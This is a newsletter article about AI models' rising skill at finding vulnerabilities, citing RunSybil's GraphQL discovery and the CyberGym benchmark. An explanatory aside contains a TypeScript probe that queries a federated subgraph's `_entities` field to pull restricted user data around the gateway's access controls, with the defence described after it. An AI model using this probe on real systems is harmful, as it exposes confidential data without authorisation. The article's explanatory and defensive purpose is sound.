AI’s Hacking Skills Are Approaching an ‘Inflection Point’

Vlad Ionescu and Ariel Herbert-Voss, cofounders of the cybersecurity startup RunSybil, were momentarily confused when their AI tool, Sybil, warned them of a weakness in a client's systems last November.

Sybil uses a mix of AI models, along with a few proprietary technical tricks, to scan computer systems for problems that hackers can exploit, such as an unpatched server or a misconfigured database.

In this case, Sybil flagged a problem with the customer's deployment of federated GraphQL, a query language used to specify how data is accessed over the web through application programming interfaces (APIs). The issue meant the customer was inadvertently exposing confidential information.
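To make the class of problem concrete: the article doesn't describe the exact flaw, but one well-known failure mode in federated GraphQL setups (such as Apollo Federation) is leaving an internal subgraph directly reachable. Subgraphs expose a special `_entities` field so the gateway can stitch data together; queried directly, that field can return data the gateway would normally gate behind access controls. The TypeScript sketch below illustrates that pattern only; the URL, the `User` type, and its fields are hypothetical and are not details of RunSybil's finding.

```ts
// Hypothetical probe against a federated GraphQL subgraph that is
// directly reachable, bypassing the gateway's access controls.
// Assumes Node 18+ (global fetch). All names here are illustrative.
const SUBGRAPH_URL = "http://internal-subgraph.example/graphql"; // hypothetical

// Apollo Federation subgraphs expose `_entities` so the gateway can
// resolve entities by key; hit directly, it may skip authorization.
const query = `
  query Probe($reps: [_Any!]!) {
    _entities(representations: $reps) {
      ... on User {
        id
        email   # fields the gateway would normally restrict
      }
    }
  }`;

async function probe(): Promise<void> {
  const res = await fetch(SUBGRAPH_URL, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      query,
      // Ask the subgraph to resolve a User entity by its key fields.
      variables: { reps: [{ __typename: "User", id: "1" }] },
    }),
  });
  console.log(JSON.stringify(await res.json(), null, 2));
}

probe().catch(console.error);
```

The defense is equally simple in outline: keep subgraphs off the public network and have them reject requests that don't come through the gateway, so `_entities` is only reachable behind the gateway's authorization layer.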

What surprised Ionescu and Herbert-Voss was that spotting the problem required remarkably deep knowledge of several different systems and how they interact. RunSybil says it has since found the same problem in other GraphQL deployments, before anyone else had made it public. “We searched the Internet, and it didn't exist,” says Herbert-Voss. “Discovering it was a logical step in terms of the possibilities of models – a step change.”

The discovery points to a growing risk. As AI models get smarter, their ability to find zero-day bugs and other vulnerabilities grows with them. And the same intelligence that can discover vulnerabilities can also be used to exploit them.

Dawn Song, a computer scientist at UC Berkeley who specializes in both AI and security, says that recent advances in AI have produced models that are better at finding flaws. Simulated reasoning, which involves breaking a problem into parts, and agentic abilities, such as searching the web or installing and running software tools, have enhanced models' cyber skills.

“The cyber security capabilities of frontier models have increased drastically in recent months,” she says. “This is an inflection point.”

Last year, Song created a benchmark called CyberGym to measure how well large language models find vulnerabilities in large open-source software projects. CyberGym includes 1,507 known vulnerabilities drawn from 188 projects.

In July 2025, Anthropic's Claude Sonnet 4 was able to find about 20 percent of the vulnerabilities in the benchmark. By October 2025, a new model, Claude Sonnet 4.5, could identify 30 percent. “AI agents can find zero-days, and at very low cost,” says Song.

Song says this trend shows the need for new countermeasures, including having AI help cybersecurity experts. “We need to think about how you can really help AI more on the defense side, and one can explore different approaches,” she says.

One idea is for frontier AI companies to share models with security researchers before launch so they can use the models to find bugs and secure systems ahead of a general release.

Another countermeasure, Song says, is to think about how software is built in the first place. Her lab has shown that it is possible to use AI to generate code that is more secure than what most programmers write today. “In the long run, we think this secure-by-design approach will really help defenders,” says Song.

The RunSybil team says that, in the short term, the coding skills of AI models could mean that hackers gain the upper hand. “AI can generate actions on a computer and generate code, and those are two things that hackers do,” says Herbert-Voss. “If those capabilities accelerate, that means offensive security actions will also accelerate.”


This is an edition of Will Knight's AI Lab newsletter. Read previous newsletters here.



